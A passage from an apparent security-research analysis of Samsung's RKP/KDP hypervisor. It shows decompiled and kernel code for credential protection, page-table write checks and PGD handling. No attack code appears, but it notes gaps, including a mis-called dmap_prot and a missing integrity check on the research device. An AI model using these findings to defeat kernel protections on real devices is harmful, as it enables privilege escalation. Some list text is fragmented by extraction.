!is_phys_map_ns(freelist_ptr_pa)) {
uh_log('L', "rkp_kdp.c", 259, "Invalid Free Pointer %lx %lx %lx", regs->x2, regs->x3, regs->x4);
is_cred = is_phys_map_cred(freelist_ptr_pa);
is_sec_ptr = is_phys_map_sec_ptr(freelist_ptr_pa);
rkp_policy_violation("Data Protection Violation %lx %lx %lx", is_cred, is_sec_ptr, regs->x4);
rkp_phys_map_unlock(vafreelist_ptr_par14);
}
rkp_phys_map_unlock(freelist_ptr_pa);
}
if (invalid_cred_fp(object_pa, regs->x2, offset)) {
uh_log('L', "rkp_kdp.c", 267, "Invalid cred pointer_fp!! %lx %lx %lx", regs->x2, regs->x3, regs->x4);
rkp_policy_violation("Data Protection Violation %lx %lx %lx", regs->x2, regs->x3, regs->x4);
} else if (invalid_sec_ptr_fp(object_pa, regs->x2, offset)) {
uh_log('L', "rkp_kdp.c", 272, "Invalid Security pointer_fp 111 %lx %lx %lx", regs->x2, regs->x3, regs->x4);
is_sec_ptr = is_phys_map_sec_ptr(object_pa);
uh_log('L', "rkp_kdp.c", 273, "Invalid Security pointer_fp 222 %lx %lx %lx %lx %lx", is_sec_ptr, regs->x2,
regs->x2 - regs->x2 / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE, offset, rkp_cred->SP_SIZE);
rkp_policy_violation("Data Protection Violation %lx %lx %lx", regs->x2, regs->x3, regs->x4);
} else if (invalid_ns_fp(object_pa, regs->x2, offset)) {
uh_log('L', "rkp_kdp.c", 278, "Invalid Namespace pointer_fp!! %lx %lx %lx", regs->x2, regs->x3, regs->x4);
rkp_policy_violation("Data Protection Violation %lx %lx %lx", regs->x2, regs->x3, regs->x4);
} else {
*(offset + object_pa) = freelist_ptr;
}
}
rkp_cred_set_fp
does the following:
CRED
, SEC_PTR
or NS
in the physmap;rkp_cmd_prot_dble_map
calls rkp_prot_dble_map
.
saved_regs_t* rkp_prot_dble_map(saved_regs_t* regs) {
// ...
address = regs->x2 & 0xFFFFFFFFF000;
if (!address)
return 0;
val = regs->x4;
if (val > 1) {
uh_log('L', "rkp_kdp.c", 1163, "Invalid op val %lx ", val);
return 0;
}
order = regs->x3;
if (order <= 19) {
offset = 0;
size = 0x1000 << order;
do {
res = rkp_set_map_bitmap(address + offset, val);
if (!res) {
uh_log('L', "rkp_kdp.c", 1169, "Page has no bitmap %lx %lx %lx ", address + offset, val, offset);
}
offset += 0x1000;
} while (offset < size);
}
}
rkp_prot_dble_map
does the following:
rkp_set_map_bitmap
(which uses dbl_bitmap
) on each page of the region.The attentive reader will have noticed that the kernel function dmap_prot
doesn't even call rkp_prot_dble_map
properly: it doesn't give it its addr
argument, so the arguments are all messed up.
What happens if the kernel needs to modify its pages tables entries? On the kernel side, this happens for each level in set_pud
, set_pmd
and set_pte
of arch/arm64/include/asm/pgtable.h
.
static inline void set_pud(pud_t *pudp, pud_t pud)
{
#ifdef CONFIG_UH_RKP
if (rkp_is_pg_protected((u64)pudp)) {
uh_call(UH_APP_RKP, RKP_WRITE_PGT1, (u64)pudp, pud_val(pud), 0, 0);
} else {
asm volatile("mov x1, %0\n"
"mov x2, %1\n"
"str x2, [x1]\n"
:
: "r" (pudp), "r" (pud)
: "x1", "x2", "memory");
}
#else
*pudp = pud;
#endif
dsb(ishst);
isb();
}
static inline void set_pmd(pmd_t *pmdp, pmd_t pmd)
{
#ifdef CONFIG_UH_RKP
if (rkp_is_pg_protected((u64)pmdp)) {
uh_call(UH_APP_RKP, RKP_WRITE_PGT2, (u64)pmdp, pmd_val(pmd), 0, 0);
} else {
asm volatile("mov x1, %0\n"
"mov x2, %1\n"
"str x2, [x1]\n"
:
: "r" (pmdp), "r" (pmd)
: "x1", "x2", "memory");
}
#else
*pmdp = pmd;
#endif
dsb(ishst);
isb();
}
static inline void set_pte(pte_t *ptep, pte_t pte)
{
#ifdef CONFIG_UH_RKP
/* bug on double mapping */
BUG_ON(pte_val(pte) && rkp_is_pg_dbl_mapped(pte_val(pte)));
if (rkp_is_pg_protected((u64)ptep)) {
uh_call(UH_APP_RKP, RKP_WRITE_PGT3, (u64)ptep, pte_val(pte), 0, 0);
} else {
asm volatile("mov x1, %0\n"
"mov x2, %1\n"
"str x2, [x1]\n"
:
: "r" (ptep), "r" (pte)
: "x1", "x2", "memory");
}
#else
*ptep = pte;
#endif
/*
* Only if the new pte is valid and kernel, otherwise TLB maintenance
* or update_mmu_cache() have the necessary barriers.
*/
if (pte_valid_not_user(pte)) {
dsb(ishst);
isb();
}
}
These functions have been modified. For all 3 levels, they check if the entry they are trying to write to has been set as read-only by RKP (using ro_bitmap
that we saw earlier), and if that is the case, they will call the hypervisor using the uh_call
function. The commands used for each level are (respectively):
RKP_WRITE_PGT1
RKP_WRITE_PGT2
RKP_WRITE_PGT3
It can also be noted that set_pte
will in addition check if the (intermeditate) physical address is already mapped using dbl_bitmap
to prevent double mapping (mapping of the same PA to two or more VAs).
On the hypervisor side, rkp_cmd_write_pgtx
simply calls rkp_lxpgt_write
after incrementing a counter.
uint8_t* rkp_l1pgt_write(uint64_t pudp, int64_t pud_new) {
// ...
pudp_pa = rkp_get_pa(pudp);
pud_old = *pudp_pa;
rkp_phys_map_lock(pudp_pa);
if (!is_phys_map_l1(pudp_pa)) {
if (!rkp_deferred_inited) {
set_entry_of_pgt((int64_t*)pudp_pa, pud_new);
return rkp_phys_map_unlock(pudp_pa);
}
rkp_policy_violation("L1 write wrong page, %lx, %lx", pudp_pa, pud_new);
}
is_kernel = is_phys_map_kernel(pudp_pa);
if (pud_old) {
if ((pud_old & 3) != 3)
rkp_policy_violation("l1_pgt write cannot handle blocks - for old entry, %lx", pudp_pa);
res = rkp_l2pgt_process_table(pud_old & 0xFFFFFFFFF000, (pudp_pa << 27) & 0x7FC0000000, 0);
}
start_addr = 0xFFFFFF8000000000;
if (!is_kernel)
start_addr = 0;
if (pud_new) {
addr = start_addr | (pudp_pa << 27) & 0x7FC0000000;
if ((pud_new & 3) != 3)
rkp_policy_violation("l1_pgt write cannot handle blocks - for new entry, %lx", pud_new);
res = rkp_l2pgt_process_table(pud_new & 0xFFFFFFFFF000, addr, 1);
if (!is_kernel)
set_pxn_bit_of_desc(&pud_new, 1);
if ((pud_new & 3) != 0 && (pud_new & 0xFFFFFFFFF000) == 0)
uh_log('L', "rkp_l1pgt.c", 309, "l1 write zero");
}
if (res) {
uh_log('L', "rkp_l1pgt.c", 316, "L1 write failed, %lx, %lx", pudp_pa, pud_new);
return rkp_phys_map_unlock(pudp_pa);
}
set_entry_of_pgt(pudp_pa, pud_new);
return rkp_phys_map_unlock(pudp_pa);
}
rkp_l1pgt_write
does the following:
rkp_l2pgt_process_table
on the old L2 table;is_alloc
= 0 to indicate a removal.rkp_l2pgt_process_table
on the new L2 table;uint8_t* rkp_l2pgt_write(int64_t pmdp, int64_t pmd_new) {
// ...
pmdp_pa = rkp_get_pa(pmdp);
pmd_old = *pmdp_pa;
rkp_phys_map_lock(pmdp_pa);
if (!is_phys_map_l2(pmdp_pa)) {
if (rkp_deferred_inited) {
uh_log('D', "rkp_l2pgt.c", 236, "l2 is not marked as L2 Type in Physmap, trying to fix it, %lx", pmdp_pa);
} else {
set_entry_of_pgt(pmdp_pa, pmd_new);
return rkp_phys_map_unlock(pmdp_pa);
}
}
is_flag3 = is_phys_map_flag3(pmdp_pa);
is_kernel = is_phys_map_kernel(pmdp_pa);
start_addr = 0xFFFFFF8000000000;
if (!is_kernel)
start_addr = 0;
addr = (pmdp_pa << 18) & 0x3FE00000 | ((is_flag3 & 0x1FF) << 30) | start_addr;
if (pmd_old) {
res = check_single_l2e(pmdp_pa, addr, 0);
if (res < 0) {
uh_log('L', "rkp_l2pgt.c", 254, "Failed in freeing entries under the l2e %lx %lx", pmdp_pa, pmd_new);
uh_log('L', "rkp_l2pgt.c", 276, "l2 write failed, %lx, %lx", pmdp_pa, pmd_new);
return rkp_phys_map_unlock(pmdp_pa);
}
}
if (pmd_new) {
res = check_single_l2e(&pmd_new, addr, 1);
if (res < 0) {
uh_log('L', "rkp_l2pgt.c", 276, "l2 write failed, %lx, %lx", pmdp_pa, pmd_new);
return rkp_phys_map_unlock(pmdp_pa);
}
if ((pmd_new & 3) != 0 && (pmd_new & 0xFFFFFFFFF000) == 0)
uh_log('L', "rkp_l2pgt.c", 269, "l2 write zero, %lx", pmdp_pa);
}
set_entry_of_pgt(pmdp_pa, pmd_new);
return rkp_phys_map_unlock(pmdp_pa);
}
rkp_l2pgt_write
does the following:
check_single_l2e
on the old entry;is_alloc
= 0 to indicate a removal;rkp_l2pgt_process_table
on the new entry;int64_t* rkp_l3pgt_write(uint64_t ptep, int64_t pte_val) {
// ...
ptep_pa = rkp_get_pa(ptep);
rkp_phys_map_lock(ptep_pa);
if (is_phys_map_l3(ptep_pa) || is_phys_map_free(ptep_pa)) {
if ((pte_val & 3) != 3 || get_pxn_bit_of_desc(pte_val, 3))
allowed = 1;
else
allowed = rkp_deferred_inited == 0;
} else {
allowed = 0;
}
rkp_phys_map_unlock(ptep_pa);
cs_enter(&l3pgt_lock);
if (stext_ptep && ptep_pa < stext_ptep && (ptep_pa ^ stext_ptep) <= 0xFFF) {
if (pte_val)
pte_val |= 0x20000000000000;
cs_exit(&l3pgt_lock);
return set_entry_of_pgt(ptep_pa, pte_val);
}
cs_exit(&l3pgt_lock);
if (!allowed) {
pxn_bit = get_pxn_bit_of_desc(pte_val, 3);
return rkp_policy_violation("Write L3 to wrong page type, %lx, %lx, %x", ptep_pa, pte_val, pxn_bit);
}
return set_entry_of_pgt(ptep_pa, pte_val);
}
rkp_l3pgt_write
does the following:
allowed
to 1.allowed
will still be 0;allowed
is 1, it makes the modification and returns;Another operation that the kernel might need to do is allocate or free a page table directory. On the kernel side, this is done by pgd_alloc
and pgd_free
of arch/arm64/mm/pgd.c
.
pgd_t *pgd_alloc(struct mm_struct *mm)
{
// ...
pgd_t *ret = NULL;
ret = (pgd_t *) rkp_ro_alloc();
if (!ret) {
if (PGD_SIZE == PAGE_SIZE)
ret = (pgd_t *)__get_free_page(PGALLOC_GFP);
else
ret = kmem_cache_alloc(pgd_cache, PGALLOC_GFP);
}
if(unlikely(!ret)) {
pr_warn("%s: pgd alloc is failed\n", __func__);
return ret;
}
uh_call(UH_APP_RKP, RKP_NEW_PGD, (u64)ret, 0, 0, 0);
return ret;
// ...
}
void pgd_free(struct mm_struct *mm, pgd_t *pgd)
{
// ...
uh_call(UH_APP_RKP, RKP_FREE_PGD, (u64)pgd, 0, 0, 0);
/* if pgd memory come from read only buffer, the put it back */
/*TODO: use a macro*/
if (is_rkp_ro_page((u64)pgd))
rkp_ro_free((void *)pgd);
else {
if (PGD_SIZE == PAGE_SIZE)
free_page((unsigned long)pgd);
else
kmem_cache_free(pgd_cache, pgd);
}
// ...
}
Once again, these functions have been modified. The first modification is that instead of using pages from the kernel page allocator, they will use read-only pages returned by RKP. These pages are allowed using rkp_ro_alloc
and freed using rkp_ro_free
.
The second modification is that they will make RKP aware of the newly allocated or freed page table directory by calling uh_call
with the command RKP_NEW_PGD
and RKP_FREE_PGD
respectively.
On the hypervisor sides, rkp_cmd_new_pgd
and rkp_cmd_free_pgd
call rkp_l1pgt_new_pgd
and rkp_l1pgt_free_pgd
respectively, after incrementing a counter.
void rkp_l1pgt_new_pgd(saved_regs_t* regs) {
// ...
pgdp = rkp_get_pa(regs->x2) & 0xFFFFFFFFFFFFF000;
if (pgdp == INIT_MM_PGD || pgdp == ID_MAP_PGD || TRAMP_PGD && pgdp == TRAMP_PGD) {
rkp_policy_violation("PGD new value not allowed, pgdp : %lx", pgdp);
} else if (rkp_inited) {
if (rkp_l1pgt_process_table(pgdp, 0, 1) < 0)
uh_log('L', "rkp_l1pgt.c", 383, "l1pgt processing is failed, pgdp : %lx", pgdp);
}
}
rkp_l1pgt_new_pgd
does the following:
swapper_pg_dir
, idmap_pg_dir
or tramp_pg_dir
;rkp_l1pgt_process_table
.void rkp_l1pgt_free_pgd(saved_regs_t* regs) {
// ...
pgd_pa = rkp_get_pa(regs->x2);
pgdp = pgd_pa & 0xFFFFFFFFFFFFF000;
if (pgdp == INIT_MM_PGD || pgdp == ID_MAP_PGD || (TRAMP_PGD && pgdp == TRAMP_PGD)) {
uh_log('E', "rkp_l1pgt.c", 345, "PGD free value not allowed, pgdp=%lx k_pgd=%lx k_id_pgd=%lx", pgdp, INIT_MM_PGD,
ID_MAP_PGD);
rkp_policy_violation("PGD free value not allowed, pgdp=%p k_pgd=%p k_id_pgd=%p", pgdp, INIT_MM_PGD, ID_MAP_PGD);
} else if (rkp_inited) {
if ((get_ttbr0_el1() & 0xFFFFFFFFFFFF) == (pgd_pa & 0xFFFFFFFFF000) ||
(get_ttbr1_el1() & 0xFFFFFFFFFFFF) == (pgd_pa & 0xFFFFFFFFF000)) {
uh_log('E', "rkp_l1pgt.c", 354, "PGD free value not allowed, pgdp=%lx ttbr0_el1=%lx ttbr1_el1=%lx", pgdp,
get_ttbr0_el1(), get_ttbr1_el1());
}
if (rkp_l1pgt_process_table(pgdp, 0, 0) < 0)
uh_log('L', "rkp_l1pgt.c", 363, "l1pgt processing is failed, pgdp : %lx", pgdp);
}
}
rkp_l1pgt_free_pgd
does the following:
swapper_pg_dir
, idmap_pg_dir
or tramp_pg_dir
;TTBR0_EL1
or TTBR1_EL1
;rkp_l1pgt_process_table
to process the removal.We have seen that struct cred
and struct task_security_struct
are now allocated in read-only pages and cannot be modified by the kernel. These structures also get new fields that are going to be used for Data Flow Integrity. Each one gets a "back-pointer", which is a pointer to the owning structure:
struct task_struct
for struct cred
;struct cred
for struct task_security_struct
.The struct cred
also gets a back-pointer to the owning task's PGD, as well as a "use counter" that prevents reusing the struct cred
of another struct task_struct
(especially init's credentials).
// from include/linux/cred.h
struct cred {
// ...
atomic_t *use_cnt;
struct task_struct *bp_task;
void *bp_pgd;
unsigned long long type;
} __randomize_layout;
// from security/selinux/include/objsec.h
struct task_security_struct {
// ...
void *bp_cred;
};
These values are supposed to be verified on each SELinux hooks via a call to security_integrity_current
, but it looks like this isn't implemented in our research device and they maybe forgot to add it. We will take a source code snippet from another device that has it.
// from security/security.c
#define call_void_hook(FUNC, ...) \
do { \
struct security_hook_list *P; \
\
if(security_integrity_current()) break; \
list_for_each_entry(P, &security_hook_heads.FUNC, list) \
P->hook.FUNC(__VA_ARGS__); \
} while (0)
#define call_int_hook(FUNC, IRC, ...) ({ \
int RC = IRC; \
do { \
struct security_hook_list *P; \
\
RC = security_integrity_current(); \
if (RC != 0) \
break; \
list_for_each_entry(P, &security_hook_heads.FUNC, list) { \
RC = P->hook.FUNC(__VA_ARGS__); \
if (RC != 0) \
break; \
} \
} while (0); \
RC; \
})
// from security/selinux/hooks.c
static inline unsigned int cmp_sec_integrity(const struct cred *cred,struct mm_struct *mm)
{
return ((cred->bp_task != current) ||
(mm && (!( in_interrupt() || in_softirq())) &&
(cred->bp_pgd != swapper_pg_dir) &&
(mm->pgd != cred->bp_pgd)));
}
extern struct cred init_cred;
static inline unsigned int rkp_is_valid_cred_sp(u64 cred,u64 sp)
{
struct task_security_struct *tsec = (struct task_security_struct *)sp;
if((cred == (u64)&init_cred) &&
( sp == (u64)&init_sec)){
return 0;
}
if(!rkp_ro_page(cred)|| !rkp_ro_page(cred+sizeof(struct cred)-1)||
(!rkp_ro_page(sp)|| !rkp_ro_page(sp+sizeof(struct task_security_struct)-1))) {
return 1;
}
if((u64)tsec->bp_cred != cred) {
return 1;
}
return 0;
}
inline void rkp_print_debug(void)
{
u64 pgd;
struct cred *cred;
pgd = (u64)(current->mm?current->mm->pgd:swapper_pg_dir);
cred = (struct cred *)current_cred();
printk(KERN_ERR"\n RKP44 cred = %p bp_task = %p bp_pgd = %p pgd = %llx stat = #%d# task = %p mm = %p \n",cred,cred->bp_task,cred->bp_pgd,pgd,(int)rkp_ro_page((unsigned long long)cred),current,current->mm);
//printk(KERN_ERR"\n RKP44_1 uid = %d gid = %d euid = %d egid = %d \n",(u32)cred->uid,(u32)cred->gid,(u32)cred->euid,(u32)cred->egid);
printk(KERN_ERR"\n RKP44_2 Cred %llx #%d# #%d# Sec ptr %llx #%d# #%d#\n",(u64)cred,rkp_ro_page((u64)cred),rkp_ro_page((u64)cred+sizeof(struct cred)),(u64)cred->security, rkp_ro_page((u64)cred->security),rkp_ro_page((u64)cred->security+sizeof(struct task_security_struct)));
}
/* Main function to verify cred security context of a process */
int security_integrity_current(void)
{
rcu_read_lock();
if ( rkp_cred_enable &&
(rkp_is_valid_cred_sp((u64)current_cred(),(u64)current_cred()->security)||
cmp_sec_integrity(current_cred(),current->mm)||
cmp_ns_integrity())) {
rkp_print_debug();
rcu_read_unlock();
panic("RKP CRED PROTECTION VIOLATION\n");
}
rcu_read_unlock();
return 0;
}
unsigned int rkp_get_task_sec_size(void)
{
return sizeof(struct task_security_struct);
}
unsigned int rkp_get_offset_bp_cred(void)
{
return offsetof(struct task_security_struct,bp_cred);
}
We can see that security_integrity_current
does the following:
cred
and task_security_struct
are not init
's;cred
and task_security_struct
are in a RO page;task_security_struct
points to cred
;cred
points to the current task_struct
;cred
isn't swapper_pg_dir
;cred
is the PDG of the current mm_struct
;As mentionned previously, the kernel will need to call RKP each time it wants to modify the struct cred
of process. RKP will do some verifications before executing the kernel demands. And to do these verifications, it needs to know the offsets of various fields of the struct task_struct
and struct cred
structures.
On the kernel side, the command is sent in kdp_init
from init/main.c
.
// from init/main.c
void kdp_init(void)
{
kdp_init_t cred;
cred.credSize = sizeof(struct cred);
cred.sp_size = rkp_get_task_sec_size();
cred.pgd_mm = offsetof(struct mm_struct,pgd);
cred.uid_cred = offsetof(struct cred,uid);
cred.euid_cred = offsetof(struct cred,euid);
cred.gid_cred = offsetof(struct cred,gid);
cred.egid_cred = offsetof(struct cred,egid);
cred.bp_pgd_cred = offsetof(struct cred,bp_pgd);
cred.bp_task_cred = offsetof(struct cred,bp_task);
cred.type_cred = offsetof(struct cred,type);
cred.security_cred = offsetof(struct cred,security);
cred.usage_cred = offsetof(struct cred,use_cnt);
cred.cred_task = offsetof(struct task_struct,cred);
cred.mm_task = offsetof(struct task_struct,mm);
cred.pid_task = offsetof(struct task_struct,pid);
cred.rp_task = offsetof(struct task_struct,real_parent);
cred.comm_task = offsetof(struct task_struct,comm);
cred.bp_cred_secptr = rkp_get_offset_bp_cred();
cred.verifiedbootstate = (u64)verifiedbootstate;
#ifdef CONFIG_SAMSUNG_PRODUCT_SHIP
cred.selinux.ss_initialized_va = (u64)&ss_initialized;
#endif
uh_call(UH_APP_RKP, RKP_KDP_X40, (u64)&cred, 0, 0, 0);
}
asmlinkage __visible void __init start_kernel(void)
{
// ...
if (rkp_cred_enable)
kdp_init();
cred_init();
// ...
}
On the hypervisor side, the command is handled in rkp_cmd_cred_init
, which calls rkp_cred_init
.
int64_t rkp_cmd_cred_init(saved_regs_t* regs) {
uh_log('L', "rkp.c", 399, "KDP_KDP About to call cred_init ");
rkp_cred_init(regs);
return 0;
}
void rkp_cred_init(saved_regs_t* regs) {
// ...
rkp_cred = malloc(0xF0, 0);
cred = rkp_get_pa(regs->x2);
if (cred_inited == 1) {
uh_log('L', "rkp_kdp.c", 1083, "Cannot initialized for Second Time\n");
return;
}
cred_inited = 1;
credSize = cred->credSize;
sp_size = cred->sp_size;
uid_cred = cred->uid_cred;
euid_cred = cred->euid_cred;
gid_cred = cred->gid_cred;
egid_cred = cred->egid_cred;
usage_cred = cred->usage_cred;
bp_pgd_cred = cred->bp_pgd_cred;
bp_task_cred = cred->bp_task_cred;
type_cred = cred->type_cred;
security_cred = cred->security_cred;
bp_cred_secptr = cred->bp_cred_secptr;
if (uid_cred > credSize || euid_cred > credSize || gid_cred > credSize || egid_cred > credSize ||
usage_cred > credSize || bp_pgd_cred > credSize || bp_task_cred > credSize || type_cred > credSize ||
security_cred > credSize || bp_cred_secptr > sp_size) {
uh_log('L', "rkp_kdp.c", 1102, "RKP_9a19e9ca");
return;
}
rkp_cred->CRED_SIZE = cred->credSize;
rkp_cred->SP_SIZE = sp_size;
rkp_cred->CRED_UID_OFFSET = uid_cred >> 2;
rkp_cred->CRED_EUID_OFFSET = euid_cred >> 2;
rkp_cred->CRED_GID_OFFSET = gid_cred >> 2;
rkp_cred->CRED_EGID_OFFSET = egid_cred >> 2;
rkp_cred->TASK_PID_OFFSET = cred->pid_task >> 2;
rkp_cred->TASK_CRED_OFFSET = cred->cred_task >> 3;
rkp_cred->TASK_MM_OFFSET = cred->mm_task >> 3;
rkp_cred->TASK_PARENT_OFFSET = cred->rp_task >> 3;
rkp_cred->TASK_COMM_OFFSET = cred->comm_task >> 3;
rkp_cred->CRED_SECURITY_OFFSET = security_cred >> 3;
rkp_cred->CRED_BP_PGD_OFFSET = bp_pgd_cred >> 3;
rkp_cred->CRED_BP_TASK_OFFSET = bp_task_cred >> 3;
rkp_cred->CRED_FLAGS_OFFSET = type_cred >> 3;
rkp_cred->SEC_BP_CRED_OFFSET = bp_cred_secptr >> 3;
rkp_cred->MM_PGD_OFFSET = cred->pgd_mm >> 3;
rkp_cred->CRED_USE_CNT = usage_cred >> 3;
rkp_cred->VERIFIED_BOOT_STATE = 0;
vbs_va = cred->verifiedbootstate;
if (vbs_va) {
vbs_pa = check_and_convert_kernel_input(vbs_va);
if (vbs_pa != 0) {
rkp_cred->VERIFIED_BOOT_STATE = strcmp(vbs_pa, "orange") == 0;
}
}
rkp_cred->SELINUX = rkp_get_pa(&cred->selinux);
rkp_cred->SS_INITIALIZED_VA = rkp_get_pa(cred->selinux.ss_initialized_va);
uh_log('L', "rkp_kdp.c", 1147, "RKP_4bfa8993 %lx %lx %lx %lx");
}
rkp_cred_init
does the following:
rkp_cred
that will contains all the offsets;rkp_cred
structure;verifiedbootstate
is "orange");ss_initialized
(is SELinux initialized);When the kernel wants to update the PGD of a struct task_struct
, it calls RKP to also update the back pointer in the struct cred
. On the kernel side, this mainly happens when a process is being copied.
// from fs/exec.c
static int exec_mmap(struct mm_struct *mm)
{
// ...
if(rkp_cred_enable){
uh_call(UH_APP_RKP, RKP_KDP_X43,(u64)current_cred(), (u64)mm->pgd, 0, 0);
}
// ...
}
// from kernel/fork.c
void rkp_assign_pgd(struct task_struct *p)
{
u64 pgd;
pgd = (u64)(p->mm ? p->mm->pgd :swapper_pg_dir);
uh_call(UH_APP_RKP, RKP_KDP_X43, (u64)p->cred, (u64)pgd, 0, 0);
}
static __latent_entropy struct task_struct *copy_process(
unsigned long clone_flags,
unsigned long stack_start,
unsigned long stack_size,
int __user *child_tidptr,
struct pid *pid,
int trace,
unsigned long tls,
int node)
{
// ...
if(rkp_cred_enable)
rkp_assign_pgd(p);
// ...
}
rkp_cmd_pgd_assign
calls rkp_pgd_assign
.
int64_t rkp_cmd_pgd_assign(saved_regs_t* regs) {
rkp_pgd_assign(regs);
return 0;
}
int64_t rkp_phys_map_verify_cred(uint64_t cred) {
// ...
if (!cred)
return 1;
if (cred != cred / CRED_BUFF_SIZE * CRED_BUFF_SIZE)
return 1;
rkp_phys_map_lock(cred);
if (is_phys_map_cred(cred)) {
uh_log('L', "rkp_kdp.c", 127, "physmap verification failed !!!!! %lx %lx %lx", cred, cred, cred);
rkp_phys_map_unlock(cred);
return 1;
}
rkp_phys_map_unlock(cred);
return 0;
}
void rkp_pgd_assign(saved_regs_t* regs) {
// ...
cred = rkp_get_pa(regs->x2);
pgd = regs->x3;
if (rkp_phys_map_verify_cred(cred)) {
uh_log('L', "rkp_kdp.c", 146, "rkp_pgd_assign !! %lx %lx %lx", cred, regs->x2, pgd);
return;
}
*(cred + 8 * rkp_cred->CRED_BP_PGD_OFFSET) = pgd;
}
rkp_pgd_assign
will check if the struct cred
is needed marked as CRED
in the physmap, before making the update of the bp_pgd
field of the struct cred
.
Similarly to the previous command, when the kernel needs to change the security
field of the struct cred
, it will call RKP. This happens when the struct cred
is being freed.
// from security/selinux/hooks.c
int rkp_from_tsec_jar(unsigned long addr)
{
static void *objp;
static struct kmem_cache *s;
static struct page *page;
objp = (void *)addr;
if(!objp)
return 0;
page = virt_to_head_page(objp);
s = page->slab_cache;
if(s && s->name) {
if(!strcmp(s->name,"tsec_jar")) {
return 1;
}
}
return 0;
}
int chk_invalid_kern_ptr(u64 tsec)
{
return (((u64)tsec >> 36) != (u64)0xFFFFFFC);
}
void rkp_free_security(unsigned long tsec)
{
if(!tsec ||
chk_invalid_kern_ptr(tsec))
return;
if(rkp_ro_page(tsec) &&
rkp_from_tsec_jar(tsec)){
kmem_cache_free(tsec_jar,(void *)tsec);
}
else {
kfree((void *)tsec);
}
}
static void selinux_cred_free(struct cred *cred)
{
// ...
if (rkp_ro_page((unsigned long)cred)) {
uh_call(UH_APP_RKP, RKP_KDP_X45, (u64) &cred->security, 7, 0, 0);
}
// ...
rkp_free_security((unsigned long)tsec);
// ...
}
rkp_cmd_cred_set_security
calls rkp_cred_set_security
.
int64_t rkp_cmd_cred_set_security(saved_regs_t* regs) {
rkp_cred_set_security(regs);
return 0;
}
int64_t* rkp_cred_set_security(saved_regs_t* regs) {
// ...
cred = rkp_get_pa(regs->x2 - 8 * rkp_cred->CRED_SECURITY_OFFSET);
if (is_phys_map_cred(cred))
return uh_log('L', "rkp_kdp.c", 146, "invalidate_security: invalid cred !!!!! %lx %lx %lx", regs->x2,
regs->x2 - 8 * CRED_SECURITY_OFFSET, CRED_SECURITY_OFFSET);
security = rkp_get_pa(regs->x2);
*security = 7;
return security;
}
rkp_cred_set_security
checks if the address it was given indeed being to struct cred
(marked as CRED
in the physmap), before setting the security
field of the struct cred
to 7 (poison value).
When a process is making an execve
syscall, checking extra is performed.
// from fs/exec.c
#define rkp_is_nonroot(x) ((x->cred->type)>>1 & 1)
#define rkp_is_lod(x) ((x->cred->type)>>3 & 1)
#define CHECK_ROOT_UID(x) (x->cred->uid.val == 0 || x->cred->gid.val == 0 || \
x->cred->euid.val == 0 || x->cred->egid.val == 0 || \
x->cred->suid.val == 0 || x->cred->sgid.val == 0)
static int rkp_restrict_fork(struct filename *path)
{
struct cred *shellcred;
if (!strcmp(path->name, "/system/bin/patchoat") ||
!strcmp(path->name, "/system/bin/idmap2")) {
return 0;
}
/* If the Process is from Linux on Dex,
then no need to reduce privilege */
#ifdef CONFIG_LOD_SEC
if(rkp_is_lod(current)){
return 0;
}
#endif
if(rkp_is_nonroot(current)){
shellcred = prepare_creds();
if (!shellcred) {
return 1;
}
shellcred->uid.val = 2000;
shellcred->gid.val = 2000;
shellcred->euid.val = 2000;
shellcred->egid.val = 2000;
commit_creds(shellcred);
}
return 0;
}
SYSCALL_DEFINE3(execve,
const char __user *, filename,
const char __user *const __user *, argv,
const char __user *const __user *, envp)
{
struct filename *path = getname(filename);
int error = PTR_ERR(path);
if(IS_ERR(path))
return error;
if(rkp_cred_enable){
uh_call(UH_APP_RKP, RKP_KDP_X4B, (u64)path->name, 0, 0, 0);
}
if(CHECK_ROOT_UID(current) && rkp_cred_enable) {
if(rkp_restrict_fork(path)){
pr_warn("RKP_KDP Restricted making process. PID = %d(%s) "
"PPID = %d(%s)\n",
current->pid, current->comm,
current->parent->pid, current->parent->comm);
putname(path);
return -EACCES;
}
}
putname(path);
return do_execve(getname(filename), argv, envp);
}
The kernel will call RKP, passing it the executable path, to flag the process by setting the type
field of the struct cred
. It also calls rkp_restrict_fork
if the current task executes as root.
rkp_restrict_fork
does the following:
patchoat
or idmap2
, allow it;On the hypervisor side, rkp_cmd_mark_ppt
calls rkp_mark_ppt
.
int64_t rkp_cmd_mark_ppt(saved_regs_t* regs) {
rkp_mark_ppt(regs);
return 0;
}
void rkp_mark_ppt(saved_regs_t* regs) {
// ...
current_va = rkp_ns_get_current();
current_pa = rkp_get_pa(current_va);
current_cred = rkp_get_pa(*(current_pa + 8 * rkp_cred->TASK_CRED_OFFSET));
name_va = regs->x2;
name_pa = rkp_get_pa(name_va);
if (!current_cred || !name_pa || rkp_phys_map_verify_cred(current_cred)) {
uh_log('L', "rkp_kdp.c", 551, "rkp_mark_ppt NULL Cred OR filename %lx %lx %lx", current_cred, 0, 0);
}
if (!strcmp(name_pa, "/system/bin/adbd") || !strcmp(name_pa, "/system/bin/app_process32") ||
!strcmp(name_pa, "/system/bin/app_process64")) {
*(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_MARK_PPT;
}
if (!strcmp(name_pa, "/system/bin/nst"))
*(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_LOD;
if (!strcmp(name_pa, "/system/bin/idmap2"))
*(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) &= ~CRED_FLAG_CHILD_PPT;
if (!strcmp(name_pa, "/system/bin/patchoat"))
*(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) &= ~CRED_FLAG_CHILD_PPT;
}
rkp_mark_ppt
does the following:
adbd
, app_process32
or app_process64
;CRED_FLAG_MARK_PPT
(4).nst
;CRED_FLAG_LOD
(8, checked by rkp_is_lod
).idmap2
or patchoat
;CRED_FLAG_CHILD_PPT
(2, checked by rkp_is_nonroot
).This command is the heart of KDP. It is called when the kernel needs to assign a struct cred
to a struct task_struct
and does extensive checking to detect privilege escalations.
On the kernel side, copy_creds
, commit_creds
and override_creds
will call prepare_ro_creds
instead of simply setting the cred
field of the struct task_struct
.
prepare_ro_creds
does the following:
struct cred
;struct task_security_struct
;struct cred
that the kernel wanted to assign to RKP;struct cred
;prepare_ro_creds
returns the RO struct cred
which gets assigned.// from include/linux/cred.h
typedef struct cred_param{
struct cred *cred;
struct cred *cred_ro;
void *use_cnt_ptr;
void *sec_ptr;
unsigned long type;
union {
void *task_ptr;
